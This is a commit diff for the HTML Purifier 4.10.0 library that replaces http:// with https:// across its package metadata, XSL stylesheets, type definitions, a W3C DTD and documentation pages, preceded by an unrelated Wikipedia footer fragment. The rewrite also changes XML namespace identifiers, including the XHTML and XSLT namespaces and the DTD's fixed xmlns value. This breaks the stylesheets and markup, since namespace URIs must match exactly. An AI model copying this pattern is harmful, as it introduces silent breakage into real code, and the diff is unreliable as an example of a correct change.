<li id="about"><a href="/wiki/Wikipedia:About" title="Wikipedia:About">About Wikipedia</a></li>
<li id="disclaimer"><a href="/wiki/Wikipedia:General_disclaimer" title="Wikipedia:General disclaimer">Disclaimers</a></li>
</ul>

4
htmlpurifier-4.10.0/composer.json
View File

@@ -3,13 +3,13 @@
"description": "Standards compliant HTML filter written in PHP",
"type": "library",
"keywords": ["html"],
"homepage": "http://htmlpurifier.org/",
"homepage": "https://htmlpurifier.org/",
"license": "LGPL",
"authors": [
{
"name": "Edward Z. Yang",
"email": "admin@htmlpurifier.org",
"homepage": "http://ezyang.com"
"homepage": "https://ezyang.com"
}
],
"require": {

12
htmlpurifier-4.10.0/configdoc/styles/plain.xsl
View File

@@ -1,14 +1,14 @@
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet
version = "1.0"
xmlns = "http://www.w3.org/1999/xhtml"
xmlns:xsl = "http://www.w3.org/1999/XSL/Transform"
xmlns = "https://www.w3.org/1999/xhtml"
xmlns:xsl = "https://www.w3.org/1999/XSL/Transform"
>
<xsl:output
method = "xml"
encoding = "UTF-8"
doctype-public = "-//W3C//DTD XHTML 1.0 Transitional//EN"
doctype-system = "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
doctype-system = "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
indent = "no"
media-type = "text/html"
/>
@@ -55,7 +55,7 @@
<xsl:attribute name="id">type-<xsl:value-of select="@id" /></xsl:attribute>
<h3><code><xsl:value-of select="@id" /></code>: <xsl:value-of select="@name" /></h3>
<div class="type-description">
<xsl:copy-of xmlns:xhtml="http://www.w3.org/1999/xhtml" select="xhtml:div/node()" />
<xsl:copy-of xmlns:xhtml="https://www.w3.org/1999/xhtml" select="xhtml:div/node()" />
</div>
</div>
</xsl:template>
@@ -113,7 +113,7 @@
</xsl:template>
<xsl:template match="namespace/description">
<div class="description">
<xsl:copy-of xmlns:xhtml="http://www.w3.org/1999/xhtml" select="xhtml:div/node()" />
<xsl:copy-of xmlns:xhtml="https://www.w3.org/1999/xhtml" select="xhtml:div/node()" />
</div>
</xsl:template>
@@ -163,7 +163,7 @@
</xsl:template>
<xsl:template match="directive/description">
<div class="description">
<xsl:copy-of xmlns:xhtml="http://www.w3.org/1999/xhtml" select="xhtml:div/node()" />
<xsl:copy-of xmlns:xhtml="https://www.w3.org/1999/xhtml" select="xhtml:div/node()" />
</div>
</xsl:template>
<xsl:template match="directive/deprecated">

30
htmlpurifier-4.10.0/configdoc/types.xml
View File

@@ -1,44 +1,44 @@
<?xml version="1.0" encoding="UTF-8"?>
<types>
<type id="string" name="String"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="string" name="String"><div xmlns="https://www.w3.org/1999/xhtml">
A <a
href="http://docs.php.net/manual/en/language.types.string.php">sequence
href="https://docs.php.net/manual/en/language.types.string.php">sequence
of characters</a>.
</div></type>
<type id="istring" name="Case-insensitive string"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="istring" name="Case-insensitive string"><div xmlns="https://www.w3.org/1999/xhtml">
A series of case-insensitive characters. Internally, upper-case
ASCII characters will be converted to lower-case.
</div></type>
<type id="text" name="Text"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="text" name="Text"><div xmlns="https://www.w3.org/1999/xhtml">
A series of characters that may contain newlines. Text tends to
indicate human-oriented text, as opposed to a machine format.
</div></type>
<type id="itext" name="Case-insensitive text"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="itext" name="Case-insensitive text"><div xmlns="https://www.w3.org/1999/xhtml">
A series of case-insensitive characters that may contain newlines.
</div></type>
<type id="int" name="Integer"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="int" name="Integer"><div xmlns="https://www.w3.org/1999/xhtml">
An <a
href="http://docs.php.net/manual/en/language.types.integer.php">
href="https://docs.php.net/manual/en/language.types.integer.php">
integer</a>. You are alternatively permitted to pass a string of
digits instead, which will be cast to an integer using
<code>(int)</code>.
</div></type>
<type id="float" name="Float"><div xmlns="http://www.w3.org/1999/xhtml">
A <a href="http://docs.php.net/manual/en/language.types.float.php">
<type id="float" name="Float"><div xmlns="https://www.w3.org/1999/xhtml">
A <a href="https://docs.php.net/manual/en/language.types.float.php">
floating point number</a>. You are alternatively permitted to
pass a numeric string (as defined by <code>is_numeric()</code>),
which will be cast to a float using <code>(float)</code>.
</div></type>
<type id="bool" name="Boolean"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="bool" name="Boolean"><div xmlns="https://www.w3.org/1999/xhtml">
A <a
href="http://docs.php.net/manual/en/language.types.boolean.php">boolean</a>.
href="https://docs.php.net/manual/en/language.types.boolean.php">boolean</a>.
You are alternatively permitted to pass an integer <code>0</code> or
<code>1</code> (other integers are not permitted) or a string
<code>"on"</code>, <code>"true"</code> or <code>"1"</code> for
<code>true</code>, and <code>"off"</code>, <code>"false"</code> or
<code>"0"</code> for <code>false</code>.
</div></type>
<type id="lookup" name="Lookup array"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="lookup" name="Lookup array"><div xmlns="https://www.w3.org/1999/xhtml">
An array whose values are <code>true</code>, e.g. <code>array('key'
=> true, 'key2' => true)</code>. You are alternatively permitted
to pass an array list of the keys <code>array('key', 'key2')</code>
@@ -47,20 +47,20 @@
strictly numerically indexed: <code>array('key1', 2 =>
'key2')</code> will not do what you expect and emits a warning.
</div></type>
<type id="list" name="Array list"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="list" name="Array list"><div xmlns="https://www.w3.org/1999/xhtml">
An array which has consecutive integer indexes, e.g.
<code>array('val1', 'val2')</code>. You are alternatively permitted
to pass a comma-separated string of keys <code>"val1, val2"</code>.
If your array is not in this form, <code>array_values</code> is run
on the array and a warning is emitted.
</div></type>
<type id="hash" name="Associative array"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="hash" name="Associative array"><div xmlns="https://www.w3.org/1999/xhtml">
An array which is a mapping of keys to values, e.g.
<code>array('key1' => 'val1', 'key2' => 'val2')</code>. You are
alternatively permitted to pass a comma-separated string of
key-colon-value strings, e.g. <code>"key1: val1, key2: val2"</code>.
</div></type>
<type id="mixed" name="Mixed"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="mixed" name="Mixed"><div xmlns="https://www.w3.org/1999/xhtml">
An arbitrary PHP value of any type.
</div></type>
</types>

6
htmlpurifier-4.10.0/docs/dev-advanced-api.html
View File

@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Specification for HTML Purifier's advanced API for defining custom filtering behavior." />
<link rel="stylesheet" type="text/css" href="style.css" />
@@ -14,7 +14,7 @@
<div id="filing">Filed under Development</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>
Please see <a href="enduser-customize.html">Customize!</a>

20
htmlpurifier-4.10.0/docs/dev-config-schema.html
View File

@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Describes config schema framework in HTML Purifier." />
@@ -14,7 +14,7 @@
<div id="filing">Filed under Development</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>
HTML Purifier has a fairly complex system for configuration. Users
@@ -39,7 +39,7 @@
couldn't think of a more descriptive file extension.)
Directive files are actually what we call <code>StringHash</code>es,
i.e. associative arrays represented in a string form reminiscent of
<a href="http://qa.php.net/write-test.php">PHPT</a> tests. Here's a
<a href="https://qa.php.net/write-test.php">PHPT</a> tests. Here's a
sample directive file, <code>Test.Sample.txt</code>:
</p>
@@ -179,7 +179,7 @@ Test.Example</pre>
<tr>
<td>string</td>
<td>'Foo'</td>
<td><a href="http://docs.php.net/manual/en/language.types.string.php">String</a> without newlines</td>
<td><a href="https://docs.php.net/manual/en/language.types.string.php">String</a> without newlines</td>
</tr>
<tr>
<td>istring</td>
@@ -239,15 +239,15 @@ Test.Example</pre>
object; users have a little bit of leeway when setting configuration
values (for example, a lookup value can be specified as a list;
HTML Purifier will flip it as necessary.) These types are defined
in <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/VarParser.php">
in <a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/VarParser.php">
library/HTMLPurifier/VarParser.php</a>.
</p>
<p>
For more information on what values are allowed, and how they are parsed,
consult <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php">
consult <a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php">
library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php</a>, as well
as <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/Interchange/Directive.php">
as <a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/Interchange/Directive.php">
library/HTMLPurifier/ConfigSchema/Interchange/Directive.php</a> for
the semantics of the parsed values.
</p>
@@ -307,7 +307,7 @@ Test.Example</pre>
<p>
All directive files go through a rigorous validation process
through <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/Validator.php">
through <a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/Validator.php">
library/HTMLPurifier/ConfigSchema/Validator.php</a>, as well
as some basic checks during building. While
listing every error out here is out-of-scope for this document, we
@@ -374,7 +374,7 @@ Test.Example</pre>
The most difficult part is translating the Interchange member variable (valueAliases)
into a directive file key (VALUE-ALIASES), but there's a one-to-one
correspondence currently. If the two formats diverge, any discrepancies
will be described in <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php">
will be described in <a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php">
library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php</a>.
</p>

6
htmlpurifier-4.10.0/docs/dev-flush.html
View File

@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Discusses when to flush HTML Purifier's various caches." />
@@ -14,7 +14,7 @@
<div id="filing">Filed under Development</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>
If you've been poking around the various folders in HTML Purifier,

6
htmlpurifier-4.10.0/docs/dev-naming.html
View File

@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Defines class naming conventions in HTML Purifier." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -14,7 +14,7 @@
<div id="filing">Filed under Development</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>The classes in this library follow a few naming conventions, which may
help you find the correct functionality more quickly. Here they are:</p>

6
htmlpurifier-4.10.0/docs/dev-optimization.html
View File

@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Discusses possible methods of optimizing HTML Purifier." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -14,7 +14,7 @@
<div id="filing">Filed under Development</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>Here are some possible optimization techniques we can apply to code sections if
they turn out to be slow. Be sure not to prematurely optimize: if you get

6
htmlpurifier-4.10.0/docs/dev-progress.html
View File

@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Tables detailing HTML element and CSS property implementation coverage in HTML Purifier." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -32,7 +32,7 @@ thead th {text-align:left;padding:0.1em;background-color:#EEE;}
<div id="filing">Filed under Development</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>
<strong>Warning:</strong> This table is kept for historical purposes and

8
htmlpurifier-4.10.0/docs/dtd/xhtml1-transitional.dtd
View File

@@ -4,9 +4,9 @@
This is the same as HTML 4 Transitional except for
changes due to the differences between XML and SGML.
Namespace = http://www.w3.org/1999/xhtml
Namespace = https://www.w3.org/1999/xhtml
For further information, see: http://www.w3.org/TR/xhtml1
For further information, see: https://www.w3.org/TR/xhtml1
Copyright (c) 1998-2002 W3C (MIT, INRIA, Keio),
All Rights Reserved.
@@ -14,7 +14,7 @@
This DTD module is identified by the PUBLIC and SYSTEM identifiers:
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
SYSTEM "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
$Revision: 1.2 $
$Date: 2002/08/01 18:37:55 $
@@ -274,7 +274,7 @@
<!ATTLIST html
%i18n;
id ID #IMPLIED
xmlns %URI; #FIXED 'http://www.w3.org/1999/xhtml'
xmlns %URI; #FIXED 'https://www.w3.org/1999/xhtml'
>
<!--================ Document Head =======================================-->

28
htmlpurifier-4.10.0/docs/enduser-customize.html
View File

@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Tutorial for customizing HTML Purifier's tag and attribute sets." />
<link rel="stylesheet" type="text/css" href="style.css" />
@@ -15,7 +15,7 @@
<div id="filing">Filed under End-User</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>
HTML Purifier has this quirk where if you try to allow certain elements or
@@ -44,7 +44,7 @@
<p>
All of the modules listed below are based off of the
<a href="http://www.w3.org/TR/2001/REC-xhtml-modularization-20010410/abstract_modules.html#sec_5.2.">modularization of
<a href="https://www.w3.org/TR/2001/REC-xhtml-modularization-20010410/abstract_modules.html#sec_5.2.">modularization of
XHTML</a>, which, while technically for XHTML 1.1, is quite a useful
resource.
</p>
@@ -76,7 +76,7 @@
<p>
As of HTMLPurifier 2.1.0, we have implemented the
<a href="http://www.w3.org/TR/2001/REC-ruby-20010531/">Ruby module</a>,
<a href="https://www.w3.org/TR/2001/REC-ruby-20010531/">Ruby module</a>,
which defines a set of tags
for publishing short annotations for text, used mostly in Japanese
and Chinese school texts, but applicable for positioning any text (not
@@ -86,7 +86,7 @@
<h3>HTML 5</h3>
<p>
<a href="http://www.whatwg.org/specs/web-apps/current-work/">HTML 5</a>
<a href="https://www.whatwg.org/specs/web-apps/current-work/">HTML 5</a>
is a fork of HTML 4.01 by WHATWG, who believed that XHTML 2.0 was headed
in the wrong direction. It too is a working draft, and may change
drastically before publication, but it should be noted that the
@@ -354,10 +354,10 @@ $def = $config-&gt;getHTMLDefinition(true);
<p>
For a complete list, consult
<a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/AttrTypes.php"><code>library/HTMLPurifier/AttrTypes.php</code></a>;
<a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/AttrTypes.php"><code>library/HTMLPurifier/AttrTypes.php</code></a>;
more information on attributes that accept parameters can be found on their
respective includes in
<a href="http://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/AttrDef"><code>library/HTMLPurifier/AttrDef</code></a>.
<a href="https://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/AttrDef"><code>library/HTMLPurifier/AttrDef</code></a>.
</p>
<p>
@@ -655,7 +655,7 @@ $def = $config-&gt;getHTMLDefinition(true);
<p class="aside">
Readers familiar with the modularization may have noticed that the Core
attribute collection differs from that specified by the <a
href="http://www.w3.org/TR/xhtml-modularization/abstract_modules.html#s_commonatts">abstract
href="https://www.w3.org/TR/xhtml-modularization/abstract_modules.html#s_commonatts">abstract
modules of the XHTML Modularization 1.1</a>. We believe this section
to be in error, as <code>br</code> permits the use of the <code>style</code>
attribute even though it uses the <code>Core</code> collection, and
@@ -676,7 +676,7 @@ $def = $config-&gt;getHTMLDefinition(true);
<p>
We're going to implement <code>form</code>. Before we embark, lets
grab a reference implementation from over at the
<a href="http://www.w3.org/TR/html4/sgml/loosedtd.html">transitional DTD</a>:
<a href="https://www.w3.org/TR/html4/sgml/loosedtd.html">transitional DTD</a>:
</p>
<pre>&lt;!ELEMENT FORM - - (%flow;)* -(FORM) -- interactive form --&gt;
@@ -746,7 +746,7 @@ $form-&gt;excludes = array('form' => true);</strong></pre>
<p>
And that's all there is to it! Implementing the rest of the form
module is left as an exercise to the user; to see more examples
check the <a href="http://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/HTMLModule"><code>library/HTMLPurifier/HTMLModule/</code></a> directory
check the <a href="https://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/HTMLModule"><code>library/HTMLPurifier/HTMLModule/</code></a> directory
in your local HTML Purifier installation.
</p>
@@ -771,8 +771,8 @@ $form-&gt;excludes = array('form' => true);</strong></pre>
</p>
<ul>
<li><a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/HTMLModule.php"><code>library/HTMLPurifier/HTMLModule.php</code></a></li>
<li><a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ElementDef.php"><code>library/HTMLPurifier/ElementDef.php</code></a></li>
<li><a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/HTMLModule.php"><code>library/HTMLPurifier/HTMLModule.php</code></a></li>
<li><a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ElementDef.php"><code>library/HTMLPurifier/ElementDef.php</code></a></li>
</ul>
<h2 id="optimized">Notes for HTML Purifier 4.2.0 and earlier</h3>
@@ -831,7 +831,7 @@ $purifier = new HTMLPurifier($config);</pre>
<p>
<em>Technical notes:</em> ajh pointed out on <a
href="http://htmlpurifier.org/phorum/read.php?5,5164,5169#msg-5169">in a forum topic</a> that
href="https://htmlpurifier.org/phorum/read.php?5,5164,5169#msg-5169">in a forum topic</a> that
HTML Purifier appeared to be repeatedly writing to the cache even
when a cache entry already existed. Investigation lead to the
discovery of the following infelicity: caching of customized

6
htmlpurifier-4.10.0/docs/enduser-id.html
View File

@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Explains various methods for allowing IDs in documents safely in HTML Purifier." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -15,7 +15,7 @@
<div id="filing">Filed under End-User</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>Prior to HTML Purifier 1.2.0, this library blithely accepted user input that
looked like this:</p>

6
htmlpurifier-4.10.0/docs/enduser-slow.html
View File

@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Explains how to speed up HTML Purifier through caching or inbound filtering." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -15,7 +15,7 @@
<div id="filing">Filed under End-User</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>HTML Purifier is a very powerful library. But with power comes great
responsibility, in the form of longer execution times. Remember, this

8
htmlpurifier-4.10.0/docs/enduser-tidy.html
View File

@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Tutorial for tweaking HTML Purifier's Tidy-like behavior." />
<link rel="stylesheet" type="text/css" href="style.css" />
@@ -14,7 +14,7 @@
<div id="filing">Filed under Development</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>You've probably heard of HTML Tidy, Dave Raggett's little piece
of software that cleans up poorly written HTML. Let me say it straight
@@ -156,7 +156,7 @@ these transformations will not work. Sorry mates.</p>
<p>You can review the rendering before and after of these transformations
by consulting the <a
href="http://htmlpurifier.org/live/smoketests/attrTransform.php">attrTransform.php
href="https://htmlpurifier.org/live/smoketests/attrTransform.php">attrTransform.php
smoketest</a>.</p>
<h2>I like the general idea, but the specifics bug me!</h2>

10
htmlpurifier-4.10.0/docs/enduser-uri-filter.html
View File

@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Tutorial for creating custom URI filters." />
<link rel="stylesheet" type="text/css" href="style.css" />
@@ -14,7 +14,7 @@
<div id="filing">Filed under End-User</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>
This is a quick and dirty document to get you on your way to writing
@@ -93,7 +93,7 @@
<p>
Because the URI is presented to us in this form, and not
<code>http://bob@example.com:8080/foo.php?q=string#hash</code>, it saves us
<code>https://bob@example.com:8080/foo.php?q=string#hash</code>, it saves us
a lot of trouble in having to parse the URI every time we want to filter
it. For the record, the above URI has the following components:
</p>
@@ -192,7 +192,7 @@ $uri->addFilter(new HTMLPurifier_URIFilter_<strong>NameOfFilter</strong>(), $con
<p>
Check the
<a href="http://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/URIFilter">URIFilter</a>
<a href="https://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/URIFilter">URIFilter</a>
directory for more implementation examples, and see <a href="proposal-new-directives.txt">the
new directives proposal document</a> for ideas on what could be implemented
as a filter.

70
htmlpurifier-4.10.0/docs/enduser-utf8.html
View File

@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Describes the rationale for using UTF-8, the ramifications otherwise, and how to make the switch." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -22,7 +22,7 @@ own advice for sake of portability. -->
<div id="filing">Filed under End-User</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>Character encoding and character sets are not that
difficult to understand, but so many people blithely stumble
@@ -217,7 +217,7 @@ if your <code>META</code> tag claims that either:</p>
<p class="aside">The advice given here is for pages being served as
vanilla <code>text/html</code>. Different practices must be used
for <code>application/xml</code> or <code>application/xml+xhtml</code>, see
<a href="http://www.w3.org/TR/2002/NOTE-xhtml-media-types-20020430/">W3C's
<a href="https://www.w3.org/TR/2002/NOTE-xhtml-media-types-20020430/">W3C's
document on XHTML media types</a> for more information.</p>
